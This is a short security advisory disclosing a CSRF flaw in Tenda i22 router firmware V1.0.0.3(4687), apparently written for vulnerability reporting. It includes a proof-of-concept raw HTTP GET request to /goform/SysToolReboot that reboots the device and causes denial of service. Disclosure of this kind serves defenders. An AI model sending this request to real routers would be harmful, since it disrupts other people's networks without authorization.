Tenda i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot
Description
Tenda Router i22 V1.0.0.3(4687) is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot
Firmware information
-
Manufacturer's address: https://www.tenda.com.cn/
-
Firmware download address : https://www.tenda.com.cn/download/detail-2747.html
Affected version
Vulnerability details
This vulnerability lies in the /goform/SysToolReboot page,The details are shown below:
It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.
POC
This POC can result in a Dos.
GET /goform/SysToolReboot HTTP/1.1
Host: 192.168.204.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; user=; password=vlz1qw
Connection: close



